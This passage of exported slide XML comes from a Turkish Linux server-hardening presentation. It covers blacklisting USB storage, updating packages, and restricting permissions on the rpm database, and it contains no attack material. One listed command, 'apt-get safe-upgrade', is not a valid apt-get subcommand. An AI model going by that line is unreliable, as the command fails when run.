            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="1448" t="10313"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216550" y="1603175"/>
            <a:ext cx="4590426" cy="2884775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="808" name="Google Shape;808;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216550" y="782488"/>
            <a:ext cx="3162300" cy="272612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="809" name="Google Shape;809;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="171888" y="1055100"/>
            <a:ext cx="3251626" cy="327225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p102"/>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6"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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14" name="Shape 814"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Google Shape;815;p103"/>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USB bağlantısı kapat</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="Google Shape;816;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274525" y="823600"/>
            <a:ext cx="8531700" cy="3807000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Sisteminizin kritikliğine bağlı olarak, bazen Linux ana bilgisayarında USB bellek kullanımını devre dışı bırakmak gerekebilir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="4572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/etc/modprobe.d/blacklist.conf dosya sonuna aşağıdaki satırı ekle:</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blacklist usb_storage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="4572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/etc/rc.local dosya sonuna aşağıdaki satırı ekle:</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modprobe -r usb_storage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exit 0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Google Shape;817;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
            <a:ext cx="91440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US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kaynak: Gus Khawaja, Linux Server Hardening in 15 Steps on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1" name="Shape 821"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;p104"/>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Sistemi güncelle</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17145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dpkg -l</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Google Shape;824;p104"/>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Bu komut, bir dizinin toplam disk kullanımını (disk alanını) gösterir ve daha temiz bir çıktı sunar.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Parametreleri:</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-h parametresi kullanıldığı için, boyutlar insan tarafından daha kolay okunabilir bir formatta (gigabayt, megabayt) gösterilmiştir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="100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 toplam disk kullanımını tek bir satırda gösterir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Gereksiz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dosyaları</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> kaldır</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Google Shape;825;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="12230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apt-cache search</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="17661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apt-get install</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="23092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apt-get purge</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="Google Shape;828;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="28523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apt-get update</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="33954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apt-get safe-upgrade</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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3" name="Shape 833"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="7848300" cy="51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US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Paket veritabanı dosyalarının dışarı kapat (rpm)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="Google Shape;835;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="3889200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="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Sistemde kurulu paketler ve bu paketlerin sürümleri ile ilgili bilgiler kesinlikle son kullanıcıya gösterilmemelidir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Sürüm bilgisi alınan bir yazılım için açıklık taramak son derece kolaydır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Google Shape;836;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="6799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chown rpm:rpm /var/lib/rpm</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Google Shape;837;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="1233125"/>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chmod 750 /var/lib/rpm</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Google Shape;838;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="1808213"/>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chown rpm:rpm /var/lib/rpm/*</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200100" y="2379638"/>
            <a:ext cx="4115400" cy="434400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod 700 /var/lib/rpm/*</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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2C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